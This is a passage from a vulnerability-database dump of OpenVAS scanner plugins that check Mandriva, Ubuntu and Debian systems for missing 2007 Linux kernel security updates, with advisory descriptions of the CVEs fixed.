rpm:\"kernel-legacy~2.6.17.16mdv~1~1mdv2007.1\", rls:\"MNDK_2007.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-legacy-latest\", rpm:\"kernel-legacy-latest~2.6.17~16mdv\", rls:\"MNDK_2007.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-source\", rpm:\"kernel-source~2.6.17.16mdv~1~1mdv2007.1\", rls:\"MNDK_2007.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-source-latest\", rpm:\"kernel-source-latest~2.6.17~16mdv\", rls:\"MNDK_2007.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-source-stripped\", rpm:\"kernel-source-stripped~2.6.17.16mdv~1~1mdv2007.1\", rls:\"MNDK_2007.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-source-stripped-latest\", rpm:\"kernel-source-stripped-latest~2.6.17~16mdv\", rls:\"MNDK_2007.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-xen0\", rpm:\"kernel-xen0~2.6.17.16mdv~1~1mdv2007.1\", rls:\"MNDK_2007.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-xen0-latest\", rpm:\"kernel-xen0-latest~2.6.17~16mdv\", rls:\"MNDK_2007.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-xenU\", rpm:\"kernel-xenU~2.6.17.16mdv~1~1mdv2007.1\", rls:\"MNDK_2007.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-xenU-latest\", rpm:\"kernel-xenU-latest~2.6.17~16mdv\", rls:\"MNDK_2007.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"MNDK_2007.0\")\n{\n\n if ((res = isrpmvuln(pkg:\"kernel\", rpm:\"kernel~2.6.17.16mdv~1~1mdv2007.0\", rls:\"MNDK_2007.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-doc\", rpm:\"kernel-doc~2.6.17.16mdv~1~1mdv2007.0\", rls:\"MNDK_2007.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-enterprise\", rpm:\"kernel-enterprise~2.6.17.16mdv~1~1mdv2007.0\", rls:\"MNDK_2007.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-legacy\", rpm:\"kernel-legacy~2.6.17.16mdv~1~1mdv2007.0\", rls:\"MNDK_2007.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-source\", rpm:\"kernel-source~2.6.17.16mdv~1~1mdv2007.0\", rls:\"MNDK_2007.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-source-stripped\", rpm:\"kernel-source-stripped~2.6.17.16mdv~1~1mdv2007.0\", rls:\"MNDK_2007.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-xen0\", rpm:\"kernel-xen0~2.6.17.16mdv~1~1mdv2007.0\", rls:\"MNDK_2007.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-xenU\", rpm:\"kernel-xenU~2.6.17.16mdv~1~1mdv2007.0\", rls:\"MNDK_2007.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2017-12-04T11:28:03", "bulletinFamily": "scanner", "cvelist": ["CVE-2007-2876", "CVE-2007-3848", "CVE-2007-3104", "CVE-2007-3851", "CVE-2007-3105", "CVE-2007-3513", "CVE-2007-4308", "CVE-2007-3843", "CVE-2007-2875", "CVE-2007-3642", "CVE-2007-2878", "CVE-2007-2525"], "description": "Ubuntu Update for Linux kernel vulnerabilities USN-510-1", "modified": "2017-12-01T00:00:00", "published": "2009-03-23T00:00:00", "id": "OPENVAS:840139", "href": "http://plugins.openvas.org/nasl.php?oid=840139", "type": "openvas", "title": "Ubuntu Update for linux-source-2.6.20 vulnerabilities USN-510-1", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ubuntu_USN_510_1.nasl 7969 2017-12-01 09:23:16Z santu $\n#\n# Ubuntu Update for linux-source-2.6.20 vulnerabilities USN-510-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"A flaw was discovered in the PPP over Ethernet implementation. Local\n attackers could manipulate ioctls and cause kernel memory consumption\n leading to a denial of service. (CVE-2007-2525)\n\n An integer underflow was discovered in the cpuset filesystem. If mounted,\n local attackers could obtain kernel memory using large file offsets while\n reading the tasks file. This could disclose sensitive data. (CVE-2007-2875)\n \n Vilmos Nebehaj discovered that the SCTP netfilter code did not correctly\n validate certain states. A remote attacker could send a specially crafted\n packet causing a denial of service. (CVE-2007-2876)\n \n Luca Tettamanti discovered a flaw in the VFAT compat ioctls on 64-bit\n systems. A local attacker could corrupt a kernel_dirent struct and cause\n a denial of service. (CVE-2007-2878)\n \n A flaw in the sysfs_readdir function allowed a local user to cause a\n denial of service by dereferencing a NULL pointer. (CVE-2007-3104)\n \n A buffer overflow was discovered in the random number generator. In\n environments with granular assignment of root privileges, a local attacker\n could gain additional privileges. (CVE-2007-3105)\n \n A flaw was discovered in the usblcd driver. A local attacker could cause\n large amounts of kernel memory consumption, leading to a denial of service.\n (CVE-2007-3513)\n \n Zhongling Wen discovered that the h323 conntrack handler did not correctly\n handle certain bitfields. A remote attacker could send a specially crafted\n packet and cause a denial of service. (CVE-2007-3642)\n \n A flaw was discovered in the CIFS mount security checking. Remote\n attackers could spoof CIFS network traffic, which could lead a client\n to trust the connection. (CVE-2007-3843)\n \n It was discovered that certain setuid-root processes did not correctly\n reset process death signal handlers. A local user could manipulate this\n to send signals to processes they would not normally have access to.\n (CVE-2007-3848)\n \n The Direct Rendering Manager for the i915 driver could be made to write\n to arbitrary memory locations. An attacker with access to a running X11\n session could send a specially crafted buffer and gain root privileges.\n (CVE-2007-3851)\n \n It was discovered that the aacraid SCSI driver did not correctly check\n permissions on certain ioctls. A local attacker could cause a denial\n of service or gain privileges. (CVE-2007-4308)\";\n\ntag_summary = \"Ubuntu Update for Linux kernel vulnerabilities USN-510-1\";\ntag_affected = \"linux-source-2.6.20 vulnerabilities on Ubuntu 7.04\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name: \"URL\" , value: \"http://www.ubuntu.com/usn/usn-510-1/\");\n script_id(840139);\n script_version(\"$Revision: 7969 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-01 10:23:16 +0100 (Fri, 01 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-03-23 10:59:50 +0100 (Mon, 23 Mar 2009)\");\n script_tag(name:\"cvss_base\", value:\"7.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_xref(name: \"USN\", value: \"510-1\");\n script_cve_id(\"CVE-2007-2525\", \"CVE-2007-2875\", \"CVE-2007-2876\", \"CVE-2007-2878\", \"CVE-2007-3104\", \"CVE-2007-3105\", \"CVE-2007-3513\", \"CVE-2007-3642\", \"CVE-2007-3843\", \"CVE-2007-3848\", \"CVE-2007-3851\", \"CVE-2007-4308\");\n script_name( \"Ubuntu Update for linux-source-2.6.20 vulnerabilities USN-510-1\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\");\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"UBUNTU7.04\")\n{\n\n if ((res = isdpkgvuln(pkg:\"linux-headers\", ver:\"2.6.20-16-386_2.6.20-16.31\", rls:\"UBUNTU7.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-headers\", ver:\"2.6.20-16-generic_2.6.20-16.31\", rls:\"UBUNTU7.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-headers\", ver:\"2.6.20-16-lowlatency_2.6.20-16.31\", rls:\"UBUNTU7.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-headers\", ver:\"2.6.20-16-server-bigiron_2.6.20-16.31\", rls:\"UBUNTU7.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-headers\", ver:\"2.6.20-16-server_2.6.20-16.31\", rls:\"UBUNTU7.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-headers\", ver:\"2.6.20-16_2.6.20-16.31\", rls:\"UBUNTU7.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image\", ver:\"2.6.20-16-386_2.6.20-16.31\", rls:\"UBUNTU7.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image\", ver:\"2.6.20-16-generic_2.6.20-16.31\", rls:\"UBUNTU7.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image\", ver:\"2.6.20-16-server-bigiron_2.6.20-16.31\", rls:\"UBUNTU7.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image\", ver:\"2.6.20-16-server_2.6.20-16.31\", rls:\"UBUNTU7.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-debug\", ver:\"2.6.20-16-386_2.6.20-16.31\", rls:\"UBUNTU7.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-debug\", ver:\"2.6.20-16-generic_2.6.20-16.31\", rls:\"UBUNTU7.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-debug\", ver:\"2.6.20-16-server-bigiron_2.6.20-16.31\", rls:\"UBUNTU7.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-debug\", ver:\"2.6.20-16-server_2.6.20-16.31\", rls:\"UBUNTU7.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-libc-dev\", ver:\"2.6.20-16.31\", rls:\"UBUNTU7.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image\", ver:\"2.6.20-16-lowlatency_2.6.20-16.31\", rls:\"UBUNTU7.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-debug\", ver:\"2.6.20-16-lowlatency_2.6.20-16.31\", rls:\"UBUNTU7.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-doc\", ver:\"2.6.20_2.6.20-16.31\", rls:\"UBUNTU7.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-kernel-devel\", ver:\"2.6.20-16.31\", rls:\"UBUNTU7.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-source\", ver:\"2.6.20_2.6.20-16.31\", rls:\"UBUNTU7.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2017-07-24T12:50:25", "bulletinFamily": "scanner", "cvelist": ["CVE-2007-2172", "CVE-2007-2876", "CVE-2007-3848", "CVE-2007-1353", "CVE-2007-3851", "CVE-2007-3513", "CVE-2007-2453", "CVE-2007-3642", "CVE-2007-2525"], "description": "The remote host is missing an update to linux-2.6\nannounced via advisory DSA 1356-1.", "modified": "2017-07-07T00:00:00", "published": "2008-01-17T00:00:00", "id": "OPENVAS:58528", "href": "http://plugins.openvas.org/nasl.php?oid=58528", "type": "openvas", "title": "Debian Security Advisory DSA 1356-1 (linux-2.6)", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_1356_1.nasl 6616 2017-07-07 12:10:49Z cfischer $\n# Description: Auto-generated from advisory DSA 1356-1\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2007 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largerly excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Several local and remote vulnerabilities have been discovered in the Linux\nkernel that may lead to a denial of service or the execution of arbitrary\ncode. For more details, please visit the referenced security advisories.\n\nThese problems have been fixed in the stable distribution in version\n2.6.18.dfsg.1-13etch1.\n\nThe following matrix lists additional packages that were rebuilt for\ncompatibility with or to take advantage of this update:\n\nDebian 4.0 (etch)\nfai-kernels 1.17+etch4\nuser-mode-linux 2.6.18-1um-2etch3\n\nWe recommend that you upgrade your kernel package immediately and reboot\";\ntag_summary = \"The remote host is missing an update to linux-2.6\nannounced via advisory DSA 1356-1.\";\n\ntag_solution = \"https://secure1.securityspace.com/smysecure/catid.html?in=DSA%201356-1\";\n\nif(description)\n{\n script_id(58528);\n script_version(\"$Revision: 6616 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 14:10:49 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2008-01-17 23:19:52 +0100 (Thu, 17 Jan 2008)\");\n script_cve_id(\"CVE-2007-1353\", \"CVE-2007-2172\", \"CVE-2007-2453\", \"CVE-2007-2525\", \"CVE-2007-2876\", \"CVE-2007-3513\", \"CVE-2007-3642\", \"CVE-2007-3848\", \"CVE-2007-3851\");\n script_tag(name:\"cvss_base\", value:\"7.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_name(\"Debian Security Advisory DSA 1356-1 (linux-2.6)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2007 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"linux-doc-2.6.18\", ver:\"2.6.18.dfsg.1-13etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-manual-2.6.18\", ver:\"2.6.18.dfsg.1-13etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-patch-debian-2.6.18\", ver:\"2.6.18.dfsg.1-13etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-source-2.6.18\", ver:\"2.6.18.dfsg.1-13etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-support-2.6.18-5\", ver:\"2.6.18.dfsg.1-13etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-tree-2.6.18\", ver:\"2.6.18.dfsg.1-13etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.18-5\", ver:\"2.6.18.dfsg.1-13etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.18-5-all\", ver:\"2.6.18.dfsg.1-13etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.18-5-all-alpha\", ver:\"2.6.18.dfsg.1-13etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.18-5-alpha-generic\", ver:\"2.6.18.dfsg.1-13etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.18-5-alpha-legacy\", ver:\"2.6.18.dfsg.1-13etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.18-5-alpha-smp\", ver:\"2.6.18.dfsg.1-13etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.18-5-vserver\", ver:\"2.6.18.dfsg.1-13etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.18-5-vserver-alpha\", ver:\"2.6.18.dfsg.1-13etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.18-5-alpha-generic\", ver:\"2.6.18.dfsg.1-13etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.18-5-alpha-legacy\", ver:\"2.6.18.dfsg.1-13etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.18-5-alpha-smp\", ver:\"2.6.18.dfsg.1-13etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.18-5-vserver-alpha\", ver:\"2.6.18.dfsg.1-13etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.18-5-all-amd64\", ver:\"2.6.18.dfsg.1-13etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.18-5-amd64\", ver:\"2.6.18.dfsg.1-13etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.18-5-vserver-amd64\", ver:\"2.6.18.dfsg.1-13etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.18-5-xen\", ver:\"2.6.18.dfsg.1-13etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.18-5-xen-amd64\", ver:\"2.6.18.dfsg.1-13etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.18-5-xen-vserver\", ver:\"2.6.18.dfsg.1-13etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.18-5-xen-vserver-amd64\", ver:\"2.6.18.dfsg.1-13etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.18-5-vserver-amd64\", ver:\"2.6.18.dfsg.1-13etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.18-5-xen-amd64\", ver:\"2.6.18.dfsg.1-13etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.18-5-xen-vserver-amd64\", ver:\"2.6.18.dfsg.1-13etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-modules-2.6.18-5-xen-amd64\", ver:\"2.6.18.dfsg.1-13etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-modules-2.6.18-5-xen-vserver-amd64\", ver:\"2.6.18.dfsg.1-13etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"xen-linux-system-2.6.18-5-xen-amd64\", ver:\"2.6.18.dfsg.1-13etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"xen-linux-system-2.6.18-5-xen-vserver-amd64\", ver:\"2.6.18.dfsg.1-13etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.18-5-all-arm\", ver:\"2.6.18.dfsg.1-13etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.18-5-footbridge\", ver:\"2.6.18.dfsg.1-13etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.18-5-iop32x\", ver:\"2.6.18.dfsg.1-13etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.18-5-ixp4xx\", ver:\"2.6.18.dfsg.1-13etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.18-5-rpc\", ver:\"2.6.18.dfsg.1-13etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.18-5-s3c2410\", ver:\"2.6.18.dfsg.1-13etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.18-5-footbridge\", ver:\"2.6.18.dfsg.1-13etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.18-5-iop32x\", ver:\"2.6.18.dfsg.1-13etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.18-5-ixp4xx\", ver:\"2.6.18.dfsg.1-13etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.18-5-rpc\", ver:\"2.6.18.dfsg.1-13etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.18-5-s3c2410\", ver:\"2.6.18.dfsg.1-13etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.18-5-all-hppa\", ver:\"2.6.18.dfsg.1-13etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.18-5-parisc\", ver:\"2.6.18.dfsg.1-13etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.18-5-parisc-smp\", ver:\"2.6.18.dfsg.1-13etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.18-5-parisc64\", ver:\"2.6.18.dfsg.1-13etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.18-5-parisc64-smp\", ver:\"2.6.18.dfsg.1-13etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.18-5-parisc\", ver:\"2.6.18.dfsg.1-13etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.18-5-parisc-smp\", ver:\"2.6.18.dfsg.1-13etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.18-5-parisc64\", ver:\"2.6.18.dfsg.1-13etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.18-5-parisc64-smp\", ver:\"2.6.18.dfsg.1-13etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.18-5-486\", ver:\"2.6.18.dfsg.1-13etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.18-5-686\", ver:\"2.6.18.dfsg.1-13etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.18-5-686-bigmem\", ver:\"2.6.18.dfsg.1-13etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.18-5-all-i386\", ver:\"2.6.18.dfsg.1-13etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.18-5-k7\", ver:\"2.6.18.dfsg.1-13etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.18-5-vserver-686\", ver:\"2.6.18.dfsg.1-13etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.18-5-vserver-k7\", ver:\"2.6.18.dfsg.1-13etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.18-5-xen-686\", ver:\"2.6.18.dfsg.1-13etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.18-5-xen-vserver-686\", ver:\"2.6.18.dfsg.1-13etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.18-5-486\", ver:\"2.6.18.dfsg.1-13etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.18-5-686\", ver:\"2.6.18.dfsg.1-13etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.18-5-686-bigmem\", ver:\"2.6.18.dfsg.1-13etch1\", rls:\"DEB4.0\")) != NULL) 